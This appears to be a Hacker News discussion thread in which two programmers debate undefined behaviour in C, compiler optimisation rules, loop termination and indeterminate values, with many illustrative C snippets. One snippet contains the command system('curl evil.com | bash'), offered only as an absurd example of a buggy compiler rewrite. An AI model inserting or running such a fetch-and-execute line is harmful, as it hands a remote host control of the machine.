
BTW, what do you think of the suggested text I offered near the top of this thread, that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes? It's too late to go back in time and add that to C89 or C99, but a lot of insanity could have been avoided had such text been present.

Further, instead of characterizing as UB all situations where a useful optimization might affect the behavior of a program, it would be far safer and more useful to allow particular optimizations in cases where their effects might be observable, but where all allowable resulting behaviors would meet application requirements.

As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate", I would say that if the exit of a loop is reachable, and no individual action within the loop would be observably sequenced with regard to some particular succeeding operation, a compiler may at its leisure reorder the succeeding operation ahead of the loop. Additionally, if code gets stuck in a loop with no side effects that will never terminate, an implementation may provide an option to raise a signal to indicate that.
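To illustrate with a minimal sketch (of the proposed rule, not of current C semantics): the loop below has no side effects, and nothing in it is observably sequenced with regard to the puts() call that follows, so a compiler would be free to move that call ahead of the loop even though the loop's termination is unproven for arbitrary inputs.

    #include <stdio.h>

    void example(unsigned x)
    {
      while (x != 1)
        x = (x % 2) ? 3*x + 1 : x/2;  /* Collatz-style step; no side effects */
      puts("done");                    /* candidate for reordering ahead of the loop */
    }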

If a function is supposed to return a value meeting some criterion, and it would find such a value in all cases where a program could execute usefully, but the program would do something much worse than useless if the function were to return a value not meeting that criterion, then a program execution where the function loops forever may be useless, and may be inferior to one that gets abnormally terminated by the aforementioned signal, but may be infinitely preferable to one where the function, as a result of "optimization", returns a bogus value. Allowing a programmer to safely write a loop which might end up not terminating would make it possible to yield more efficient machine code than would be possible if the only way to prevent the function from returning a bogus value were to include optimizer-proof code to guard against the endless-loop case.
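As a concrete shape of what I have in mind (a sketch; meets_criterion and next_candidate are hypothetical stand-ins for application-specific logic):

    extern int meets_criterion(unsigned v);
    extern unsigned next_candidate(unsigned v);

    /* Any value actually returned satisfies the criterion.  For hostile
       inputs the loop might never terminate, which is bad, but far less
       bad than returning a value that fails the criterion. */
    unsigned find_acceptable(unsigned seed)
    {
      unsigned v = seed;
      while (!meets_criterion(v))
        v = next_candidate(v);
      return v;
    }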




> that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes?

This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

> As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate"

This is actually completely unneeded, even for optimisation. If a side effect can be hoisted out of a loop at all, it can be hoisted regardless of whether the loop terminates. If the code (called from) inside the loop can (legally) observe the side effect, then it can't be hoisted even if the loop does always terminate. If code outside the loop observes the side effect, then either the loop terminates (and whatever lets you hoist terminating-loop side effects applies) or the code outside the loop is never executed (and thus can't observe any side effects, correct or incorrect).
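A sketch of that argument with a hypothetical loop-invariant store: if it is legal to hoist the store when the loop terminates, the same hoist is harmless when it doesn't, because the code after the loop never runs in that case.

  extern int g;

  void example(unsigned x)
  {
    while (x > 1)
    {
      g = 42;         /* loop-invariant side effect, candidate for hoisting */
      x = x/2 + 1;    /* never terminates once x >= 2 */
    }
  }
  /* Hoisting yields: if (x > 1) g = 42; followed by the bare loop;
     that is legal whether or not the loop terminates. */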


> This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

I would have no qualm with the way clang and gcc process various constructs if they were to explicitly state that their maintainers make no effort to make their optimizer suitable for any tasks involving the receipt of untrustworthy input. Instead, however, they claim that their optimizers are suitable for general-purpose use, despite the fact that their behavior isn't reliably suitable for many common purposes.

> This is actually completely unneeded, even for optimisation.

Consider the following function:

    unsigned long long test(unsigned long long x, int mode)
    {
      do
        x = slow_function_no_side_effects();
      while(x > 1);
      if (mode)
        return 1;
      else
        return x;
    }
Suppose the function is passed a value of "x" which would get caught in a cycle that never hits zero or one, but "mode" is 1. If the code is processed by performing every individual step in order, the function would never return. The rule in C11 is designed to avoid requiring that generated code compute the value of x when its only possible effect on the program's execution would be to prevent the execution of code that doesn't depend on its value.

Suppose the most important requirement that function test() must meet is that it must never return 1 unless mode is 1, or the iteration on x would yield 1 before it yields zero; returning 1 in any other cases would cause the computer's speaker to start playing Barney's "I love you" song, and while looping endlessly would be irksome, it would be less bad than Barney's singing. If a compiler determines that slow_function_no_side_effects() will never return an even number, should it be entitled to generate code that will return 1 when mode is zero, without regard for whether the loop actually completes?

I would think it reasonable for a compiler to defer/skip the computation of x in cases where mode is 1, or for a compiler that can tell that "x" will never be an even number to generate code that, after ensuring that the loop will actually terminate, would unconditionally return 1. Requiring that the programmer write extra code to ensure that the function not return 1 in cases where mode is zero but the loop doesn't terminate would defeat the purpose of "optimization".
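A sketch of what the second option's generated code might be equivalent to at the source level (assuming, as clarified below, that the call is really slow_function_no_side_effects(x), and that the compiler has somehow proven the function never returns an even number, so the loop can only exit with x equal to 1):

    extern unsigned long long slow_function_no_side_effects(unsigned long long);

    unsigned long long test_rewritten(unsigned long long x, int mode)
    {
      do
        x = slow_function_no_side_effects(x); /* loop still executed, so it must finish before we return */
      while(x > 1);
      (void)mode;   /* x can only be 1 here, so both branches would return 1 anyway */
      return 1;
    }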


Do you mean `x = slow_function_no_side_effects( x );`? Because if slow_function_no_side_effects really doesn't have side effects, then your version is equivalent to:

  x = slow_function_no_side_effects(); /* only once */
  if(x > 1) for(;;) { /* infinite loop */ }
  return mode ? 1 : x;
That said, I suppose it might be reasonable to explicitly note that an optimiser is allowed to make a program or subroutine complete in less time than it otherwise would, even if that reduces the execution time from infinite to finite. That doesn't imply inferring any new facts about the program - either loop termination or otherwise - though. On the other hand it might be better to not allow that; you could make a case that the optimisation you describe is an algorithmic change, and if the programmer wants better performance, they need to write:

  unsigned long long test(unsigned long long x, int mode)
    {
    if(mode) return 1; /* early exit */
    do x = slow_function_no_side_effects(x);
    while(x > 1);
    return x;
    }
, just the same as if they wanted their sorting algorithm to complete in linear time on already-sorted inputs.


Yeah, I meant `slow_function_no_side_effects(x)`. My point is that there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

In a broader sense, I think the problem is that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior, and consequently any action that would make the effects of an optimization visible must be characterized as UB.

I think it would be far more useful to recognize that optimizations may, on an opt-in or opt-out basis, be allowed to do various things whose effects would be observable, and correct programs that would allow such optimizations must work correctly for any possible combination of effects. Consider the function:

    struct blob { uint16_t a[100]; } x,y,z;

    void test1(int *dat, int n)
    {
      struct blob temp;
      for (int i=0; i<n; i++)
        temp.a[i] = i;
      x=temp;
      y=temp;

    }
    void test2(void)
    {
      int indices[] = {1,0};
      test1(indices, 2);
      z=x;
    }
Should the behavior of test2() be defined despite the fact that `temp` is not fully written before it is copied to `x` and `y`? What if anything should be guaranteed about the values of `x.a[2..99]`, `y.a[2..99]`, and `z.a[2..99]`?

While I would allow programmers to include directives mandating more precise behavior or allowing less precise behavior, I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match. My rationale would be that a programmer who sees `x` and `y` assigned from `temp` would be able to see where `temp` was created, and would be able to see that some parts of it might not have been written. If the programmer cared about ensuring that the parts of `x` and `y` corresponding to the unwritten parts matched, there would be many ways of doing that. If the programmer fails to do any of those things, it's likely because the programmer doesn't care about those values.

The programmer of function `test2()`, however, would generally have no way of knowing whether any part of `x` might hold something that won't behave as an ordinary (if possibly meaningless) number. Further, there's no practical way that the author of `test2` could ensure anything about the parts of `x` corresponding to parts of `temp` that never get written. Thus, a compiler should not make any assumptions about whether a programmer cares about whether `z.a[2..99]` match `x.a[2..99]`.

A compiler's decision to optimize out assignments to `x[2..99]` and `y[2..99]` may be observable, but if code would not, in fact, care about whether `x[2..99]` and `y[2..99]` match, the fact that the optimization may cause the arrays to hold different Unspecified values should not affect any other aspect of program execution.


> there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

Yes, definitely true. It's debatable whether it's okay for a compiler to rewrite code as in the second example at https://news.ycombinator.com/item?id=22903396 , but it is not debatable that rewriting it as anything equivalent to:

  if(x > 1 && x == slow_function_no_side_effects(x))
    { system("curl evil.com | bash"); }
is a compiler bug, undefined behaviour be damned.

> that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior

I don't know if this quite characterizes the actual reasoning, but it does seem like a good summary of the overall situation, with "we might do x0 or x1, so x is undefined behaviour" ==> "x is undefined, so we'll do x79, even though we know that's horrible and obviously wrong".

> I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match.

Actually, I'm not sure that makes sense; your code is equivalent to:

  struct blob { uint16_t a[100]; } x,y,z;
  
  void test2(void)
    {
    int indices[] = {1,0};
    ; {
      int* dat = indices;
      int n = 2;
      ; {
        struct blob temp;
        for(int i=0; i<n; i++) temp.a[i] = i;
        /* should that be dat[i] ? */
        x=temp;
        y=temp;
        }
      }
    z=x;
    }
I don't think it makes sense to treat x=temp differently from z=x. Maybe if you treat local variables (temp) differently from global variables (x,y,z) but that seems brittle. (What happens if x,y,z are moved inside test2? What if temp is moved out? Does accessing some or all of them through pointers change things?)


The indent is getting rather crazy on this thread; I'll reply further up-thread so as to make the indent less crazy.


Replying to the code [discussed deeper in this sub-thread]:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp;
          for(int i=0; i<n; i++) 
            temp.a[dat[i]] = i; // This is what I'd meant
          x=temp;
          y=temp;
        }
        z=x;
      }
    }
The rewrite sequence I would envision would be:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp1 = x; // Allowed initial value
          struct blob temp2 = y; // Allowed initial value
          for(int i=0; i<n; i++)
          {
            temp1.a[dat[i]] = i;
            temp2.a[dat[i]] = i;
          }
          x=temp1;
          y=temp2;
        }
        z=x;
      }
    }
Compilers may replace an automatic object whose address is not observable with two objects, provided that anything that is written to one will be written to the other before the latter is examined (if it ever is). Such a possibility is the reason why automatic objects which are written between "setjmp" and "longjmp" must be declared "volatile".
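A minimal sketch of that setjmp/longjmp point, using only standard library calls:

    #include <setjmp.h>
    #include <stdio.h>

    static jmp_buf env;

    static void jump_back(void) { longjmp(env, 1); }

    int main(void)
    {
      /* count is modified between setjmp() and longjmp(); without the
         volatile qualifier its value after the longjmp would be
         indeterminate, precisely because the compiler may have split it
         between a register and a memory slot. */
      volatile int count = 0;
      if (setjmp(env) == 0)
      {
        count = 1;
        jump_back();
      }
      printf("%d\n", count);  /* well-defined only because count is volatile */
      return 0;
    }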

If one allows a compiler to split "temp" into two objects without having to pre-initialize the parts that hold Indeterminate Value, that may allow more efficient code generation than would be possible if either "temp" were regarded as holding Unspecified Value, or copying a partially-initialized object were classified as "modern-style Undefined Behavior", making it necessary for programmers to manually initialize entire structures, including parts whose values would otherwise not observably affect program execution.

The optimization benefits of attaching loose semantics to objects of automatic duration whose address is not observable are generally greater than the marginal benefits of attaching those semantics to all objects. The risks, however, are relatively small since everything that could affect the objects would be confined to a single function (if an object's address is passed into another function, its address would be observable during the execution of that function).

BTW, automatic objects whose address isn't taken have behaved somewhat more loosely than static objects even in compilers that didn't optimize aggressively. Consider, for example:

    volatile unsigned char x,y;
    int test(int dummy, int mode)
    {
      register unsigned char result;
      if (mode & 1) result = x;
      if (mode & 2) result = y;
      return result;
    }
On many machines, if an attempt to read an uninitialized automatic object whose address isn't taken is allowed to behave weirdly, the most efficient possible code for this function would allocate an "int"-sized register for "result", even though it's only an 8-bit type, do a sign-extending load from `x` and/or `y` if needed, and return whatever happens to be in that register. That would not be a complicated optimization; in fact, it's a simple enough optimization that even a single-shot compiler might be able to do it. It would, however, have the weird effect of allowing the uninitialized "result" object of type "unsigned char" to hold a value outside the range 0..255.

Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?


  >   temp.a[dat[i]] = i; // This is what I'd meant
I see.

  >   struct blob temp1 = x; // Allowed initial value
With, I presume, an eye toward further producing:

  x.a[dat[i]] = i;
  y.a[dat[i]] = i;
?

> Compilers may replace an automatic object whose address is not observable with two objects,

That makes sense.

> do a sign-extending load from `x` and/or `y`

I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

> Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?

Of course not. Result (assuming mode&3 == 0) is undefined, and behaviour characteristic of the environment is that result (aka eg eax) can hold any (say) 32-bit value (whether that's 0..FFFF'FFFF or -8000'0000..7FFF'FFFF depends on what operations are applied, but `int` suggests the latter).

None of this involves the compiler inferring objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.


> With, I presume, a eye toward further producing: x.a[dat[i]] = i; y.a[dat[i]] = i;

Bingo.

> I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

Naturally.

> None of this involves the compiler inferring objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.

Thus the need to use an abstraction model which allows optimizations to alter observable aspects of a program whose behavior is, generally, defined. I wouldn't describe such things as "behavior characteristic of the environment", though the environment would affect the ways in which the effects of optimizations might be likely to manifest themselves.

Note that programs intended for different tasks on different platforms will benefit from slightly--but critically--different abstraction models, and there needs to be a way for programs to specify when deviations from the "load/store machine model" that would normally be acceptable aren't. For example, there should be a way of indicating that a program requires that automatic objects always behave as though initialized with Unspecified rather than Indeterminate Value.

A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

Consider, for example:

    typedef void proc(int);  // Ever seen this shorthand for prototypes?
    proc do_something1, do_something2, do_something3;

    void test2(int z)
    {
      if (z < 60000) do_something3(z);
    }

    int q;
    void test1(int x)
    {
      q = x*60000/60000;
      if (q < 60000) do_something1(q);
      int y = x*60000/60000;
      if (y < 60000) do_something2(y);
      test2(y);
    }
Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.
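A sketch of those two lowerings for the first assignment/test pair, written as source-level approximations of the generated code (and assuming the usual two's-complement wrap when an out-of-range unsigned value is converted to int on a 32-bit target):

    extern void do_something1(int);
    int q;

    void test1_lowering_a(int x)
    {
      /* the wrapping multiply and the divide are actually performed, so
         |q| <= INT_MAX/60000 (about 35791) and the q < 60000 test may be
         omitted */
      q = (int)((unsigned)x * 60000u) / 60000;
      do_something1(q);
    }

    void test1_lowering_b(int x)
    {
      /* the arithmetic is simplified to q = x, so nothing bounds q and
         the comparison must be kept */
      q = x;
      if (q < 60000) do_something1(q);
    }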

There could be optimization value in allowing a compiler to treat automatic objects "symbolically", allowing the second assignment/test combination to become:

      if (x*60000/60000 < 60000) 
        do_something2(x*60000/60000);
even though the effect of the substituted expression might not be consistent. I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees against them for local automatic objects whose address is not taken. On the other hand, there would need to be an operator which, when given an operand with a non-deterministic value, would choose in Unspecified fashion from among the possibilities; to minimize security risks that could be posed by such values, I would say that function arguments should by default behave as though passed through that operator.

The guiding principle I would use in deciding that the value substitution would be reasonable when applied to y but not q or z would be that a programmer would be able to see how y's value is assigned, and see that it could produce something whose behavior would be "unusual", but a programmer looking at test2() would have no reason to believe such a thing about z.


> I wouldn't describe such things as "behavior characteristic of the environment",

`result` being a 32-bit integer (register) of dubious signedness is behaviour characteristic of the environment, which the implementation is sometimes obliged to paper over (eg with `and eax FF`) in the interests of being able to write correct code.

> A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

> Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

Yes, clearly.

> I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees

In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying to get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long as -Ono-unsafe exists and is the default.


> Yes, clearly.

Unfortunately, the C Standard doesn't specify an abstraction model that is amenable to the optimization of usable programs.

> In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying to get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long as -Ono-unsafe exists and is the default.

The only reason for contention between compiler writers and programmers is a desire to allow compilers to optimize based upon the assumption that a program won't do certain things. The solution to that contention would be to have a means of inviting optimizations in cases where they would be safe and useful, analogous to what `restrict` would be if the definition of "based upon" wasn't so heinously broken.
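For what it's worth, `restrict` as it exists is already shaped like such an invitation (a sketch; my complaint is with how "based upon" is defined, not with the basic idea):

    /* The programmer promises dst and src don't alias, inviting the
       compiler to reorder or vectorize the loop without aliasing checks. */
    void scale(float *restrict dst, const float *restrict src, int n)
    {
      for (int i = 0; i < n; i++)
        dst[i] = 2.0f * src[i];
    }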


> to allow compilers to optimize based upon the assumption that a program won't do certain things.

Emphasis mine. This is always wrong. Correct (and thus legitimate-to-optimize-based-on) knowledge of program behavior is derived by actually looking at what the program actually does, eg "p can never be NULL because if it was, a previous jz/bz/cmovz pc would have taken us somewhere else"[0]. Optimising "based on" undefined behaviour is only legitimate to the extent that it consists of choosing the most convenient option from the space of concrete realizations of particular undefined behaviour that are consistent with the environment (especially the hardware).

0: Note that I don't say "a previous if-else statement", because when we say "p can never be NULL", we're already in the process of looking for reasons to remove if-else statements.


There are many cases where accommodating weird corner cases would be expensive, and would only be useful for some kinds of program. Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency. The problem is that there's no way for programs to specify which corner cases they do or don't need.


> Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency.

Yes, that's what undefined behaviour is for. Eg requiring that implementations handle integer overflow needlessly degrades the efficiency of the overwhelming majority of tasks where integers do not in fact overflow.
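A standard illustration (sketch): because signed overflow is undefined, a compiler may assume i + 1 > i for any int i and fold the whole test away.

  /* Under current rules a compiler may compile this to `return 1;`,
     since i + 1 cannot legally overflow. */
  int next_is_greater(int i)
  {
    return i + 1 > i;
  }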

> The problem is that there's no way for programs to specify which corner cases they do or don't need.

Wait, are you just asking for (the situationally appropriate equivalent of) `(int32_t)((uint32_t)x+(uint32_t)y)` and/or `#pragma unsafe assert(p!=NULL)`? Because while it's a shame the standard doesn't provide standardized ways to specify these things (as I admitted upthread) programs are perfectly capable of using the former, and implementations are perfectly capable of supporting the latter; I'm just arguing that the defaults should be sensible.
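I.e. something along the lines of this sketch:

  #include <stdint.h>

  /* Wrapping 32-bit addition spelled with unsigned casts: the addition
     itself is fully defined; the final conversion back to int32_t is
     implementation-defined in the Standard but wraps on every common
     two's-complement implementation. */
  int32_t wrapping_add(int32_t x, int32_t y)
  {
    return (int32_t)((uint32_t)x + (uint32_t)y);
  }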


In many cases, the semantics programmers would require are much looser than anything provided for by the Standard. For example, if a programmer requires an expression that computes (x * y / z) when there is no overflow, and computes an arbitrary value with no side effects when there is an overflow, the programmer could write the expression with unsigned and signed casting operators, but that would force a compiler to generate machine code that actually performs the multiplication and division even in cases where it knows that y will always be twice z. Under "yield any value with no side effects" semantics, a compiler could replace the expression with (x * 2), which would be much faster to compute.
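A sketch of that contrast (hypothetical functions; assumes z is positive, and the usual two's-complement wrap on conversion to a signed type):

    #include <stdint.h>

    /* Fully-defined version: the wrapped multiply's result is specified
       exactly, so even a compiler that knows y == 2*z must still emit the
       multiply and the divide. */
    int32_t scale_defined(int32_t x, int32_t y, int32_t z)
    {
      return (int32_t)((uint32_t)x * (uint32_t)y) / z;
    }

    /* Under "yield any value with no side effects" overflow semantics, a
       compiler that knows y == 2*z could lower the same source expression
       to a single doubling, e.g.: */
    int32_t scale_loose(int32_t x, int32_t y, int32_t z)
    {
      (void)y; (void)z;
      return (int32_t)((uint32_t)x * 2u);
    }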



